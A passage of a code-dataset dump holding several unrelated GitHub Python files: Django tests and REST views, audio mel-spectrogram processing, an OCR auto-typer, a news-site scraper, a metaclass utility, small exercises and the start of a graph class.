contain only strings, numbers, or tuples;\n#\n# if a tuple contains any mutable object either directly or indirectly, it cannot be used as a key.\n#\n# You can’t use lists as keys, since lists can be modified in place using index assignments,\n# slice assignments, or methods like append() and extend().\n\n#Note that dictionaries in python are not sorted.\n# You can use collections.OrderedDict for this.\n# Also to build correct sorting use sort/sorted functions with parameter\n# key specified to sort the way you want\n\nfrom itertools import product\nmyDict = {}\nfor x,y,z in product(range(10), range(10,20), range(20,30)):\n myDict[(x,y,z)] = sum([x,y,z])","repo_name":"iuyt9003/pythonexamples","sub_path":"examples/data-types-basic/dictionary_with_tuple_key.py","file_name":"dictionary_with_tuple_key.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29031570097","text":"\nfrom rest_framework import status\nfrom ujson import loads\n\nfrom wiki.notifications.models import PageEvent\nfrom wiki.pages.models import Page, PageWatch\nfrom intranet.wiki.tests.wiki_tests.common.unittest_base import BaseApiTestCase, now_for_tests\n\n\nclass APICreateGridHandlerTest(BaseApiTestCase):\n \"\"\"\n Tests for pages api handlers\n \"\"\"\n\n def setUp(self):\n super(APICreateGridHandlerTest, self).setUp()\n self.setUsers()\n self.client.login('thasonic')\n self.user = self.user_thasonic\n\n def _test_success(self, tag, url=None, inherited_watchers=tuple()):\n title = 'тест тайтл'\n momentBefore = now_for_tests()\n\n if url is None:\n url = '/' + 
tag\n request_url = '{api_url}/{page_tag}/.grid/create'.format(api_url=self.api_url, page_tag=tag)\n response = self.client.post(request_url, data={'title': ' ' + title + ' '})\n\n # check the response\n self.assertEqual(200, response.status_code)\n data = loads(response.content)['data']\n self.assertEqual(data['page_type'], 'grid')\n self.assertEqual(data['tag'], tag)\n self.assertEqual(data['url'], url)\n\n # check the created grid\n grid = Page.active.get(tag=tag)\n momentAfter = now_for_tests()\n self.assertEqual(grid.page_type, Page.TYPES.GRID)\n self.assertTrue(self.user in grid.get_authors())\n self.assertEqual(grid.last_author, self.user)\n self.assertEqual(grid.title, title)\n self.assertTrue(momentBefore <= grid.created_at <= momentAfter)\n\n # check the watchers\n watches = list(PageWatch.objects.filter(page=grid))\n self.assertEqual(len(watches), 1 + len(inherited_watchers))\n actual_watchers = tuple()\n for watch in watches:\n actual_watchers += (watch.user,)\n self.assertTrue(watch.is_cluster)\n self.assertTrue(momentBefore <= watch.created_at <= momentAfter)\n expected_watchers = (self.user.username,) + inherited_watchers\n self.assertEqual(set(expected_watchers), set(actual_watchers))\n\n # check the notification\n event = PageEvent.objects.get(page=grid)\n self.assertEqual(event.author, self.user)\n self.assertEqual(event.event_type, PageEvent.EVENT_TYPES.create)\n self.assertTrue(momentBefore <= event.created_at <= momentAfter)\n\n # check that fetching the grid works\n request_url = '{api_url}{page_url}'.format(api_url=self.api_url, page_url=url)\n response = self.client.get(request_url)\n self.assertEqual(200, response.status_code)\n data = loads(response.content)['data']\n self.assertEqual(data['title'], title)\n self.assertEqual(data['page_type'], 'grid')\n self.assertEqual(data['tag'], tag)\n self.assertEqual(data['url'], url)\n\n def test_success_root(self):\n \"\"\"\n Successful creation at the top level (in terms of the tag).\n \"\"\"\n self._test_success(tag='ТестГрид', url='/testgrid')\n\n def test_success_child(self):\n \"\"\"\n Successful creation below the top level (in terms of the tag).\n \"\"\"\n\n # the parent page exists, there are no inherited watchers\n self.create_page(tag='РоотТаг', body='body')\n self._test_success('РоотТаг/ТестГрид', url='/roottag/testgrid')\n\n # the parent page exists and there are inherited watchers\n page = self.create_page(tag='roottag2', authors_to_add=[self.user_kolomeetz])\n PageWatch(user=self.user_kolomeetz.username, page=page, is_cluster=True).save()\n self._test_success(tag='roottag2/testgrid', inherited_watchers=(self.user_kolomeetz.username,))\n\n def _test_invalid(self, tag, data):\n request_url = '{api_url}/{page_supertag}/.grid/create'.format(api_url=self.api_url, page_supertag=tag)\n response = self.client.post(request_url, data=data)\n\n # check the response\n self.assertEqual(status.HTTP_409_CONFLICT, response.status_code)\n return loads(response.content)['error']\n\n def _test_invalid_title(self, tag, data):\n error_data = self._test_invalid(tag, data)\n self.assertEqual(error_data['error_code'], 'CLIENT_SENT_INVALID_DATA')\n self.assertTrue(len(error_data['errors']['title']) > 0)\n\n def test_invalid(self):\n tag = 'testgrid'\n self._test_invalid_title(tag, {})\n self._test_invalid_title(tag, {'title': ''})\n self._test_invalid_title(tag, {'title': ' '})\n\n # check that no grid was created\n self.assertFalse(Page.active.filter(supertag=tag).exists())\n\n def test_already_exists(self):\n tag = 'testgrid'\n 
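# pre-create a page with this tag so that the grid creation below will conflict\n 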
self.create_page(tag=tag)\n request_url = '{api_url}/{page_supertag}/.grid/create'.format(api_url=self.api_url, page_supertag=tag)\n response = self.client.post(request_url, data={'title': 'тайтл'})\n\n # check the response\n self.assertEqual(status.HTTP_409_CONFLICT, response.status_code)\n error = loads(response.content)['error']\n self.assertEqual(error['error_code'], 'ALREADY_EXISTS')\n\n def test_cant_create_grid_over_page(self):\n supertag = 'super/tag'\n\n page_data = {'title': 'Title', 'body': 'Body'}\n\n request_url = '{api_url}/{page_supertag}'.format(api_url=self.api_url, page_supertag=supertag)\n response = self.client.post(request_url, data=page_data)\n self.assertEqual(200, response.status_code)\n\n request_url = '{api_url}/{page_supertag}/.grid/create'.format(api_url=self.api_url, page_supertag=supertag)\n response = self.client.post(request_url, data={'title': 'Test'})\n self.assertEqual(response.status_code, 409)\n\n # The page has not changed\n request_url = '{api_url}/{page_supertag}/.raw'.format(api_url=self.api_url, page_supertag=supertag)\n response = self.client.get(request_url)\n self.assertEqual(200, response.status_code)\n data = loads(response.content)['data']\n self.assertEqual(data['body'], 'Body')\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/wiki_tests/unit_unittest/api_frontend/test_create_grid.py","file_name":"test_create_grid.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39607154457","text":"import numpy as np\nimport pandas as pd\nfrom librosa.core import stft\nfrom librosa.feature import melspectrogram\nimport librosa\nfrom src.feature_extraction import call_s3\nimport matplotlib.pyplot as plt\n\nclass prep:\n # Preprocessing settings\n sampling_rate = 22050\n duration = 10 # seconds to trim down if long data\n hop_length = 512 # to make time steps\n frames = 86\n fmin = 20\n fmax = sampling_rate\n n_mels = 60\n n_fft = n_mels * 20 #Fast Fourier Transform\n samples = sampling_rate * duration\n window_length = 1024 #for STFT\n window_size = (sampling_rate // hop_length) * 5 # a five-second window\n window_hop = window_size // 4 # amount to hop during snapshot\n \n # 1 frame ~= 1/43 second (sample rate / hop length)\n # 21.5 frames = 0.5 seconds\n\n\ndef read_audio(prep, s3_client, bucket_name, fname, s3_folder, trim_long_data):\n data_stream = call_s3(s3_client, bucket_name, fname, s3_folder)\n try:\n y, sr = librosa.load(data_stream, sr=prep.sampling_rate)\n except(RuntimeError, TypeError):\n return np.array([])\n # trim silence\n if 0 < len(y): # workaround: 0 length causes error\n y, _ = librosa.effects.trim(y) # trim, top_db=default(60)\n # make it unified length to conf.samples\n if len(y) > prep.samples: # long enough\n if trim_long_data:\n y = y[0:0+prep.samples]\n else: # pad blank\n padding = prep.samples - len(y) # add padding at both ends\n offset = padding // 2\n y = np.pad(y, (offset, prep.samples - len(y) - offset), 'constant')\n return y, sr\n\n\ndef load_audio_windows(prep, label, fname, s3_client, bucket_name, s3_folder, trim_long_data):\n try:\n y, sr = read_audio(prep, s3_client, bucket_name, fname, s3_folder, trim_long_data)\n except ValueError:\n return [np.zeros((1, prep.n_mels * int(prep.window_size)))]\n S = stft(y, n_fft=prep.n_fft,\n hop_length=prep.hop_length, win_length=prep.window_length)\n mels = melspectrogram(y=y, sr=sr, S=S,\n n_mels=prep.n_mels, fmin=prep.fmin, fmax=prep.fmax)\n\n window_size = 
int(prep.window_size)\n window_hop = int(prep.window_hop)\n #truncation method\n start_frame = window_size\n end_frame = mels.shape[1] - window_hop \n windows = []\n for frame_idx in range(start_frame, end_frame, window_hop):\n # grab a slice of the spectogram at once\n win = mels[:, frame_idx-window_size:frame_idx]\n #normalize within frame\n # win = librosa.core.power_to_db(win, top_db=80)\n win = np.log(win + 1e-9) \n win -= np.mean(win)\n win /= np.std(win)\n# print(win.shape)\n win = np.hstack(win)\n win = np.append(win, label)\n win = np.append(win, fname)\n windows.append(win)\n# assert win.shape == (prep.n_mels, prep.window_size)\n return windows\n\ndef mel_windowed(df, batch, prep, s3_client, bucket_name, s3_folder, trim_long_data=True):\n acc = []\n labs = []\n i=0\n for row in df.iloc[:batch,:].iterrows():\n print(i, \" \", row[1][1])\n i += 1\n windows = load_audio_windows(prep=prep, \n label=row[1][1],\n fname=row[1][0],\n s3_client=s3_client,\n bucket_name=bucket_name, \n s3_folder=s3_folder, \n trim_long_data=trim_long_data)\n # windows = flatten(windows)\n for win in windows:\n acc.append(win[:-1])\n labs.append(win[-1])\n \n Meldf = pd.DataFrame(acc, labs)\n Meldf.columns = [*Meldf.columns[:-1], 'labels']\n return Meldf\n\n\ndef show_melspectrogram(prep, mels, title='Log-frequency power spectrogram', cmap='gist_ncar', i=0):\n librosa.display.specshow(mels, x_axis='time', y_axis='mel', \n sr=prep.sampling_rate, hop_length=prep.hop_length,\n fmin=prep.fmin, fmax=10000, cmap=cmap)\n plt.colorbar(format='%+2.0f dB')\n plt.title(title)\n plt.savefig('img/mel_win{}.png'.format(i), dpi=256)\n plt.show()","repo_name":"jaredkeil/sourcing-sound","sub_path":"src/mels.py","file_name":"mels.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37696816075","text":"from PIL import Image, ImageGrab, ImageOps\nimport pytesseract\nimport time\nimport pynput.mouse as ms\nimport pynput.keyboard as kb\nfrom pynput.keyboard import Key, Controller\n\nkeyboard = Controller()\n\npytesseract.pytesseract.tesseract_cmd = 'C:/Program Files/Tesseract-OCR/tesseract.exe'\n\nclass AutoTyper:\n \n clickCount = 0\n pCords = [0,0,0,0]\n defined = False\n pImage = None\n \n def areaSelect():\n \n print('Click twice to define TEXT window')\n \n def on_click(x, y, button, pressed):\n \n if pressed:\n print ('Mouse clicked at ({0}, {1}) with {2}'.format(x, y, button))\n if AutoTyper.clickCount == 0:\n AutoTyper.pCords[0] = x\n AutoTyper.pCords[1] = y\n elif AutoTyper.clickCount == 1:\n AutoTyper.pCords[2] = x\n AutoTyper.pCords[3] = y\n AutoTyper.defined = True\n print('')\n AutoTyper.clickCount = 0\n return False\n AutoTyper.clickCount += 1\n \n with ms.Listener(on_click = on_click) as listener:\n listener.join()\n\n\n def keyPress():\n\n print('Press UP ARROW to select OCR region')\n \n def on_press(key):\n i = 10\n\n def on_release(key):\n if key == Key.esc:\n print('Stopping key listener')\n return False\n elif key == Key.up:\n print('UP arrow pressed\\n')\n AutoTyper.areaSelect()\n AutoTyper.capture()\n \n return False\n\n with kb.Listener(on_press = on_press, on_release = on_release) as listener:\n listener.join()\n\n\n def startTyping(delayTime: float):\n\n print('Press DOWN ARROW to start typing')\n \n def on_press(key):\n i = 10\n\n def on_release(key):\n if key == Key.esc:\n print('Stopping key listener')\n return False\n elif key == Key.down:\n print('DOWN arrow pressed\\n')\n 
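# type out the text captured from the OCR region\n 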
AutoTyper.output(delayTime)\n return False\n\n with kb.Listener(on_press = on_press, on_release = on_release) as listener:\n listener.join()\n\n\n def capture():\n \n if AutoTyper.defined:\n AutoTyper.pImage = ImageGrab.grab(bbox = (AutoTyper.pCords[0],AutoTyper.pCords[1],AutoTyper.pCords[2],AutoTyper.pCords[3]))\n else:\n print('please define an area to OCR before trying to print')\n \n def output(delayTime: float):\n \n paraString = pytesseract.image_to_string(AutoTyper.pImage)\n length = len(paraString)\n\n # Character replacement to make output more accurate\n paraString = paraString.replace('|','I')\n paraString = paraString.replace('\\n',' ')\n \n for i in range(length):\n keyboard.press(paraString[i])\n keyboard.release(paraString[i])\n time.sleep(delayTime)\n \n print('The Processed String:\\n',paraString,'\\n')\n\n \ndef start(delayTime: float):\n \n print('Time interval between chars:',delayTime)\n AutoTyper.keyPress()\n AutoTyper.startTyping(delayTime)\n \n\n\n\n","repo_name":"Jeremy-Leon/AutoTyper-OCR-Script","sub_path":"AutoTyper.py","file_name":"AutoTyper.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11153558333","text":"from django.db.models import Q\nfrom rest_framework import status\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.generics import CreateAPIView, ListAPIView\nfrom rest_framework.response import Response\n\n\nclass GetOrCreateView(CreateAPIView):\n \"\"\"\n Similar to CreateAPIView, but retrieves an object that matches the identity fields of the input if possible.\n\n Requires a `model` that inherits from GenerateSerializerMixin, and an `identity_fields` tuple that gives\n the fields used for the lookup. Other fields submitted in the incoming data will be used as `defaults`\n in `get_or_create()`. 
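For example, a hypothetical subclass with `identity_fields = (\"email\",)` would look an existing object up by email and treat any other submitted fields as creation defaults. 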
There's also an `exclude` parameter, which can remove fields from the `default`\n serializer.\n \"\"\"\n model = None\n identity_fields = []\n exclude = []\n\n def create(self, request, *args, **kwargs):\n \"\"\"Implement the get-or-create functionality.\"\"\"\n serializers = self.model.generate_get_or_create_serializers(*self.identity_fields, exclude=self.exclude)\n context = self.get_serializer_context()\n\n # Use the `identity` serializer to parse the lookup fields.\n id_serializer = serializers[\"identity\"](data=request.data, context=context)\n id_serializer.is_valid(raise_exception=True)\n\n # The `defaults` serializer parses the rest - these will be passed to a new object being created.\n data_serializer = serializers[\"defaults\"](data=request.data, context=context)\n data_serializer.is_valid(raise_exception=True)\n\n # Use the normal Django get_or_create to perform the operation.\n # Any failures are raised as ValidationErrors.\n try:\n obj, created = self.model.objects.get_or_create(\n **id_serializer.validated_data,\n defaults=data_serializer.validated_data\n )\n except Exception as e:\n raise ValidationError(str(e))\n\n # Use the `result` serializer to return the full data back to the requester.\n response_serializer = serializers[\"result\"](obj, context=context)\n\n headers = self.get_success_headers(response_serializer.data)\n status_code = status.HTTP_201_CREATED if created else status.HTTP_200_OK\n return Response(response_serializer.data, status_code, headers=headers)\n\n def get_queryset(self):\n \"\"\"\n This function contains an assertion for self.queryset, which we don't use.\n\n We've overridden create(), which is normally where get_queryset() would be called, but the\n Django REST Framework browsable API runs into it as well. For that case, provide a default implementation.\n \"\"\"\n return self.model.objects.all()\n\n def get_serializer_class(self):\n \"\"\"\n This function contains an assertion for self.serializer_class, which we don't use (and doesn't really fit\n a view that uses three serializers).\n\n We've overridden create(), which is normally where get_serializer_class() would be called, but the\n Django REST Framework browsable API runs into it as well. As such, we need some kind of default.\n Return the model's basic serializer, with all the fields in place.\n \"\"\"\n return self.model.generate_serializer_class(exclude=self.exclude)\n\n\nclass SearchView(ListAPIView):\n \"\"\"\n Searches `self.queryset` against a given list of search terms.\n Requires `self.search_fields` to be set to have any effect.\n\n Expects `search_terms` as a URL kwarg, with individual search terms separated by spaces.\n\n Returns a list of each item in the queryset where each term in the given search terms is found at least\n once in the search fields on that item.\n\n All matches are case-insensitive (using Django's __icontains).\n\n Set self.max_results to limit the number of returned items; the default is 30. When the list of results\n is above this limit, we sneakily return one more - so the actual maximum is 31 by default. This allows\n the caller to detect that there are more than 30 results and prompt the user to narrow their search.\n\n Optionally, set an `order_results_by` to sort the results. 
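For example, a hypothetical `order_results_by = [\"-created_at\"]` would put the newest items first. 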
This is a list of arguments passed to\n a Django `.order_by()` queryset method.\n \"\"\"\n max_results = 30\n search_fields = []\n order_results_by = []\n\n def get_search_filters(self, search_terms):\n \"\"\"\n Accumulate a Django queryset filter using Q objects.\n\n For each search term, we need to construct a lookup for each field in self.search_fields by\n OR'ing together Q objects. The lookups for each search term are then ANDed together.\n \"\"\"\n full_search_filter = Q()\n\n for term in search_terms:\n term_filter = Q()\n\n for field in self.search_fields:\n field_filter = {f\"{field}__icontains\": term}\n term_filter |= Q(**field_filter)\n\n full_search_filter &= term_filter\n\n return full_search_filter\n\n\n def run_filter(self, queryset, search_terms):\n search_filter = self.get_search_filters(search_terms)\n return queryset.filter(search_filter).distinct().order_by(*self.order_results_by)\n\n\n def filter_queryset(self, queryset):\n # Split the search string on spaces to turn it into a list. Remove any empty items or preceding/trailing\n # whitespace from individual search terms.\n terms = self.kwargs.get(\"search_terms\", \"\")\n terms = terms.split(\" \")\n terms = [t.strip() for t in terms if t.strip()]\n\n results = self.run_filter(queryset, terms)\n\n # Trim the list of results down to be no longer than _one more than_ the maximum quantity.\n # The presence of 'an extra one on the end' is a straightforward way to convey to the client\n # that more results exist beyond the limit, so it should ask the user to narrow their search.\n length_cutoff = self.max_results + 1\n results = list(results)[:length_cutoff]\n\n return results\n","repo_name":"DelroyBrown/hotend-site","sub_path":"base_models/base_view_classes/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9122589661","text":"# initialize my data variable\ndata = []\n\n# Read and parse the data file\nfilename = \"data/wxobs20170821.txt\"\n\nwith open(filename, 'r') as datafile:\n\n# read the first three lines (header)\n for _ in range(3):\n datafile.readline()\n# print(_)\n\n# read and parse the rest of the file\n for line in datafile:\n datum = line.split()\n data.append(datum)\n\n# DEBUG\n#print(data[8][4])\n#print(data[8][:5])\n#print(data[8][::2])\n#print(data[0:10])\n#print(data[9])\n#print(data[-1])\n\n#for datum in data[slice(0,10,2)]:\nfor datum in data:\n print(datum)\n","repo_name":"weiwangncar/python_tutorial","sub_path":"mysnd.py","file_name":"mysnd.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11273258115","text":"\n#\n# to run: uwsgi --http :8000 --wsgi-file _helloworld.py\n#\n# to check: localhost:8000\n#\n\n# or just 'sudo service gunicorn start / restart'\ndef application(env, start_response):\n start_response('200 OK', [('Content-Type', 'text/html')])\n\n # keys = env.keys() # shows ALL request parameters in a heap\n keys = [\"REQUEST_METHOD\", \"PATH_INFO\", \"QUERY_STRING\"]\n out = \"\"\n for i in keys:\n out += \"{0}: {1}
<br>\\n\".format(i, env[i])\n\n return [\"Hello World<br>
\\n\", out]\n","repo_name":"d3QUone/ask_kasatkin","sub_path":"deploy_info/_helloworld.py","file_name":"_helloworld.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"22470358743","text":"# https://www.hackerrank.com/challenges/sherlock-and-squares/problem?utm_campaign=challenge-recommendation&utm_medium=email&utm_source=24-hour-campaign\n\nimport math\n\n\ndef squares(a, b):\n counter = 0\n root = int(math.sqrt(a))\n sqr = root ** 2\n while sqr <= b:\n if sqr >= a:\n counter += 1\n root += 1\n sqr = root ** 2\n return counter\n","repo_name":"BMDroid/HackerRank","sub_path":"squares.py","file_name":"squares.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15073811162","text":"from django.urls import path\nfrom . import views\n\n# LOGIN AND RESTAURANT URLS (API)\nurlpatterns = [\n path('register/', views.RegisterView.as_view(), name='register'), \n path('login/', views.LoginView.as_view()), \n path(\"user/\", views.get_username_view), \n path('logout/', views.user_logout, name='logout'),\n path('restaurantes/', views.ListaRestaurantes.as_view({'get': 'list', 'post': 'create'}), name=\"ListaRestaurantes\"),\n path('restaurantes/<int:pk>/', views.ListaRestaurantes.as_view({'get': 'retrieve', 'put': 'update', 'delete': 'destroy'}), name=\"DetalleRestaurante\"), \n]\n","repo_name":"FernandoMPR/RestaurantesApp","sub_path":"Backend/loginUser/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8681082654","text":"# -*- coding: UTF-8 -*-\nimport re\nimport os\nimport csv\nimport time\nimport zlib\nimport datetime\nfrom urllib import request\nfrom bs4 import BeautifulSoup\n\nOUTPUT_FOLDER = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'data', 'elpaiscom')\nPORTADA = \"https://elpais.com/\"\nARCHIVO_INDICE = 'index.csv'\nARCHIVO_AUTORES = 'authors.csv'\nBASE_DOMAIN = 'https://elpais.com'\n\nHEADERS = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',\n 'Content-Type': 'application/json; charset=UTF-8',\n}\n\n\ndef parse_elpaiscom_date(datestr):\n months_dict = {\n 'ene': '01',\n 'feb': '02',\n 'mar': '03',\n 'abr': '04',\n 'may': '05',\n 'jun': '06',\n 'jul': '07',\n 'ago': '08',\n 'sep': '09',\n 'oct': '10',\n 'nov': '11',\n 'dic': '12',\n }\n matchs = re.search(r'(\\d+) (\\w{3}) (\\d{4})', datestr)\n\n day = f\"0{matchs[1]}\" if len(matchs[1]) == 1 else matchs[1]\n month = months_dict.get(matchs[2])\n\n return f\"{matchs[3]}-{month}-{day}\"\n\ndef scraper_portada():\n response = request.Request(PORTADA)\n pagedata = request.urlopen(response)\n lectura_html = pagedata.read()\n soup = BeautifulSoup(lectura_html, \"html.parser\")\n\n notis = soup.select('.headline')\n output_path = os.path.join(OUTPUT_FOLDER, ARCHIVO_INDICE)\n\n with open(output_path, mode='w', newline='') as output_file:\n writer = csv.writer(output_file, delimiter=',', quotechar='\"',)\n for noti in notis:\n titulo = noti.get_text().strip()\n if len(noti.select('a')):\n enlace = noti.select('a')[0]['href'].strip()\n if enlace.startswith('/'):\n enlace = BASE_DOMAIN + enlace\n writer.writerow([titulo, enlace])\n\n\ndef scraper_articulos():\n source_path = os.path.join(OUTPUT_FOLDER, ARCHIVO_INDICE)\n 
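# the authors file accumulates one row per author per scraped article\n 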
output_path = os.path.join(OUTPUT_FOLDER, ARCHIVO_AUTORES)\n articles_dir = os.path.join(OUTPUT_FOLDER, 'articles')\n\n with open(output_path, mode='a+', newline='') as autores_file:\n writer = csv.writer(autores_file, delimiter=',', quotechar='\"',)\n\n with open(source_path, mode='r') as indice_file:\n rows = csv.reader(indice_file, delimiter=',')\n for row in rows:\n if len(row) and row[1].startswith(BASE_DOMAIN):\n enlace = row[1]\n time.sleep(1)\n print('Enlace:', enlace)\n\n # Get article name\n nombre = enlace.replace('https://elpais.com/', '').replace('/', '').replace('-', '').replace('_', '').replace('.', '').replace('&', '').replace('?', '')\n nombre += '.txt'\n\n response = request.Request(enlace, headers=HEADERS)\n pagedata = request.urlopen(response)\n if pagedata.info().get('Content-Encoding') == 'gzip':\n lectura_html = zlib.decompress(pagedata.read(), 16+zlib.MAX_WBITS)\n else:\n lectura_html = pagedata.read()\n\n soup = BeautifulSoup(lectura_html, \"html.parser\")\n\n sections = soup.select('.article_body p')\n if not len(sections):\n sections = soup.select('.articulo-cuerpo p')\n\n if not len(soup.select('.a_h .a_pt .a_ti')):\n if len(soup.select('[name=\"date\"]')):\n fechas = soup.select('[name=\"date\"]')\n else:\n fechas = soup.select('[name=\"DC.date\"]')\n fecha = fechas[0]['content'][:10]\n else:\n fechas = soup.select('.a_h .a_pt .a_ti')\n fecha = fechas[0].get_text()\n\n autores = soup.select('.a_auts .a_aut')\n autor_class = '.a_aut_n'\n autor_twitter_class = '.twitter'\n if not len(autores):\n autor_class = '.autor-texto a'\n autor_twitter_class = '.boton_twitter'\n autores = soup.select('.firma .autor')\n\n for autor in autores:\n\n # Get author profile\n if len(autor.select(autor_class)):\n autor_nombre = autor.select(autor_class)[0].get_text()\n autor_enlace = autor.select(autor_class)[0]['href']\n else:\n autor_nombre = '?'\n autor_enlace = ''\n\n # Get author twitter profile\n if len(autor.select(autor_twitter_class)):\n autor_twitter = autor.select(autor_twitter_class)[0]['href']\n else:\n autor_twitter = ''\n\n writer.writerow([\n autor_nombre, autor_enlace, autor_twitter, len(autores), enlace, nombre, fecha\n ])\n\n # Save articles on .txt files\n article_path = os.path.join(articles_dir, nombre)\n with open(article_path, mode='w', newline='') as article_file:\n for section in sections:\n article_file.write(section.get_text())\n\n\nif __name__ == \"__main__\":\n scraper_portada()\n scraper_articulos()\n","repo_name":"datairahub/journalist-ranking","sub_path":"scrapers/elpaiscom.py","file_name":"elpaiscom.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32884962744","text":"# Implement a function that takes two numbers (positional arguments) and\r\n# divides them. Request the numbers from the user and handle\r\n# the division-by-zero case.\r\n\r\ndef my_division(dividend=float(input('Enter the dividend value: '))\r\n , divider=float(input('Enter the divider value: '))):\r\n \"\"\"Returns result of dividing two numbers\"\"\"\r\n while divider == 0:\r\n try:\r\n divider != 0\r\n return dividend / divider\r\n except ZeroDivisionError:\r\n print('Error! 
'\r\n 'The divisor value cannot be equal to zero')\r\n divider = float(input('Enter the divider value: '))\r\n return dividend / divider\r\n\r\n\r\nprint(my_division())\r\n","repo_name":"AlSavva/Python-basics-homework","sub_path":"homework3-1.py","file_name":"homework3-1.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14441833323","text":"def main () :\n input_file = open('payments.in',\"r\")\n output_file = open('payments.out', \"w\")\n names = []\n payments = []\n all_lines = input_file.readlines()\n for read_string in all_lines :\n name, payment = read_string.split()\n if not name in names :\n names.append(name)\n payments.append(int(payment))\n else :\n payments[names.index(name)] += int(payment)\n\n for name in names :\n output_file.write(name + ' ' + str(payments[names.index(name)]) + '\\n')\n \n \n input_file.close()\n output_file.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"parallel-p/please","sub_path":"problems_on_please/payments/solutions/payments.py","file_name":"payments.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"13024596064","text":"from class_only_design import constants\nfrom class_only_design import util\n\n# This is inserted into decorated classes. Note, __new__ is implicitly converted to a staticmethod\n# during class creation. I'm doing so explicitly here so I have a reference I can check later. This\n# seems to prevent the implicit transformation, but I'm not sure if that's an implementation\n# detail.\n@staticmethod\ndef __new__(*args, **kwargs):\n raise TypeError(\"Class Only classes cannot be instantiated\")\n\n\nclass OnlyMeta(type):\n def __new__(cls, name, bases, classdict):\n\n if \"__init__\" in classdict:\n raise TypeError(\"Class Only classes cannot define __init__\")\n if classdict.get(\"__new__\") not in (__new__, None):\n raise TypeError(\"Class Only classes cannot define __new__\")\n\n # Disallow bases that have __new__ or __init__ defined\n for b in bases:\n if not isinstance(b, cls):\n if b.__init__ is not object.__init__:\n raise TypeError(\"Class Only classes cannot define __init__\", b)\n if b.__new__ is not object.__new__:\n raise TypeError(\"Class Only classes cannot define __new__\", b)\n\n # Insert our own __new__\n classdict[\"__new__\"] = __new__\n return super().__new__(cls, name, bases, classdict)\n\n def __setattr__(cls, name, arg):\n if not getattr(cls, \"_initializing_\", False):\n raise TypeError(\"Class Only classes are immutable\")\n return super().__setattr__(name, arg)\n\n\nclass MetaNamespace(OnlyMeta):\n def __new__(cls, name, bases, classdict):\n # disallow reserved names\n bad_names = classdict.keys() & constants.RESERVED_NAMES\n\n for b in bases:\n if not isinstance(b, cls):\n bad_names |= vars(b).keys() & constants.RESERVED_NAMES\n if bad_names:\n raise ValueError(\n \"Cannot create namespace class with reserved names\", sorted(bad_names)\n )\n classdict['_initializing_'] = True\n created_class = super().__new__(cls, name, bases, classdict)\n created_class.nameof = util.KeyGetter(created_class)\n del created_class._initializing_\n return created_class\n\n def __iter__(cls):\n # Walk up the mro, looking for namespace classes. 
Keep track of attrs we've already seen\n # and don't re-yield their values\n seen_attrs = set()\n for c in cls.__mro__:\n if isinstance(c, MetaNamespace):\n for k, v in vars(c).items():\n if not util._is_internal(k) and k not in seen_attrs:\n seen_attrs.add(k)\n yield v\n\n @classmethod\n def __prepare__(metacls, name, bases, **kwds):\n return util.NamespaceLoader()\n","repo_name":"InvestmentSystems/class-only-design","sub_path":"class_only_design/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"34628556183","text":"#!/usr/bin/env python3\n\nimport heapq\n\n\nclass Node():\n \"\"\"A class to represent nodes in a DirectedGraph. It has attributes for\n performing DFS.\"\"\"\n\n def __init__(self, i):\n self.id = i\n self.edges = []\n self.rev_edges = []\n self.explored = False\n self.fin_time = 0\n self.leader = 0\n\n def add_edge(self, edge_id):\n self.edges.append(edge_id)\n\n def add_rev_edge(self, edge_id):\n self.rev_edges.append(edge_id)\n\n def mark_explored(self):\n self.explored = True\n\n def set_leader(self, leader_id):\n self.leader = leader_id\n\n\nclass DirectedGraph():\n \"\"\"A class to represent directed graphs via the adjacency list approach.\n Each dictionary entry is a Node.\"\"\"\n\n def __init__(self, length, list_of_edges):\n self.nodes = {}\n self.nodes_by_fin_time = {}\n self.length = length\n self.fin_time = 0 # counter for the finishing time\n self.leader_count = 0 # counter for the size of leader nodes\n self.scc_heapq = [] # heapq to store the ssc by size\n\n for n in range(1, length + 1):\n self.nodes[str(n)] = Node(str(n))\n\n for n in list_of_edges:\n ns = n[0].split(' ')\n self.nodes[ns[0]].add_edge(ns[1])\n self.nodes[ns[1]].add_rev_edge(ns[0])\n\n def n_largest_sccs(self, n):\n \"\"\"Can only be run after 